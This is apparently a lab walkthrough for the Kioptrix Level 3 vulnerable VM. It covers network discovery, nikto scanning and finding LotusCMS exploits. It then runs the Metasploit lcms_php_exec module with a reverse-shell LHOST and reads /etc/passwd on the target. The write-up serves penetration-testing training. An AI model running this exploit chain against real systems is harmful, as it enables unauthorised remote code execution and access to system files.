After setting up your environment run the Kioptrix vuln-vm, and your attack machine on the same LAN. This guide and write-up will be using mostly Kali Linux as our attack machine. Once the Kioptrix vuln-vm is stood up you’ll see this on the prompt:
As the motd says, edit your “hosts” file on your attack machine to the address of the vulnerable VM machine. Since, we don’t know what the IP address of the machine is, we’ll have to do some net discovery first before we can do this.
First, run “netdiscover” on the network that the Kioptrix VM is running on. You’ll see some discoveries for devices on the subnet, one of which is Kioptrix. See screenshot:
192.168.144.5
is the host we’re looking, add 192.168.144.5
kioptrix3.com
as the motd states in your /etc/hosts files.
Also, run a ping for “kioptrix3.com
”and ensure that your attack machine is interprets the domain to your vulnerable machine, see here:
You can also run a scan on the 192.168.144.5
will wield results:
As you can see in the screenshot, there are two open ports on the vuln-vm: 80
, and 22
. This is some great information, we know have something to work with.
Port 80 indicates that this host is likely running a Web server. You can verify by opening up your browser and going to kioptrix3.com
.
We can work with this…next up let’s get back into our bash shell and run a nikto scan on the target machine. See screenshot:
There’s lots of good nuggets of information here to work with, namely the fact that phpMyAdmin is running on the target, and also we know that Apache is running on the target.
Browsing through the website as well, we see that the login page is powered by LotusCMS as well.
So we have three options to attempt to leverage to attack and hopefully exploit the host:
- phpMyAdmin
- Apache
- LotusCMS
Let’s dig into what vulnerabilities / exploits are available for LotusCMS first.
You can search exploit-db for “lotuscms” and come up with the following:
Looks like there are two exploits available for Lotus CMS.
Alternatively, you can search exploit-db database with Kali tool “searchsploit”:
We will use the first exploit, and mirror and copy the exploit to our local directory with command:searchsploit -m 18565.rb
.
We can also use msfconsole to see if this exploit already exists in metasploit framework. Run msfconsole
command on your Kali machine, then run search lotuscms
to see exploits available.
So as you can see, we have a number of exploits available…in exploit-db, and as well as a module available in Metasploit to use.
Type in use exploit/multi/http/lcms_php_exec
in your msfconsole prompt to load the module into Metasploit. Then type in set
and you’ll get a list of options that need to be set before running the exploit. See screenshot below:
To see required parameters, run show options
:
There are 3 parameters that must be set before running the exploit:
- RHOST
- RPORT
- URI
These will be set as follows:
- RHOST => kioptrix3.com
- RPORT => 80
- URI => /index.php?system=Admin
set RHOST kioptrix3.com
set RPORT 80
set URI /index.php?system=Admin
In case you’re wondering, URI parameter was derived from the LotusCMS Login Page from screenshot earlier.
If applicable, set your LHOST to the IP of the attack machine that can route back to the target host, otherwise you will not get a shell back.
Type exploit
(or run
)to run your LotusCMS exploit to the target machine.
And here you go:
Ran a few commands here, and we have our shell and directory listing.
Run cat /etc/passwd
and you’ll get passwd file from target.
So what just happened?